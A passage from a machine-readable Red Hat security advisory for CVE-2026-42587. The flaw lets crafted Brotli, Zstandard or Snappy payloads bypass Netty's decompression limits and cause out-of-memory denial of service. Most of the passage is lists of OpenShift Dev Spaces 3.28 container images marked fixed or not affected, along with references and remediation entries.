"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477220"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in Netty\u0027s HTTP content decompression. A remote attacker can exploit this flaw by sending specially crafted compressed payloads using Brotli, Zstandard, or Snappy encodings, bypassing configured decompression limits. This leads to unbounded memory allocation, potentially causing an out-of-memory condition and rendering affected Red Hat systems unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "RHBZ#2477220",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42587",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42587"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"release_date": "2026-05-13T18:22:21.699000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T19:42:14+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
